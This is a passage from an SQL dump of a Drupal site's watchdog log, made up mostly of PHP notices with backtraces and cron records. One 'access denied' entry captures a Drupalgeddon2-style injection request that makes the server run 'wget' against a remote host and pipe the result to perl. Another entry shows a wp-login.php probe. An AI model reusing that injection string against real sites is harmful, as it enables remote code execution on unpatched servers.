/var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4415,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11360:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4416,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4417,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"11.05ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4418,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"12.19ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4419,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"3.53ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4420,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"21.27ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4421,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.51ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4422,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:5:\"2.9ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4423,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:5:\"0.9ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4424,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"42.61ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4425,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:6:\"56.1ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200901),(4426,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"78.03ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200902),(4427,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200902),(4428,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:13:\"/wp-login.php\";}',4,'','http://clidentcastelo.pt/wp-login.php','','103.82.241.36',1580204702),(4429,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fpot%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580222035),(4430,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11368:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 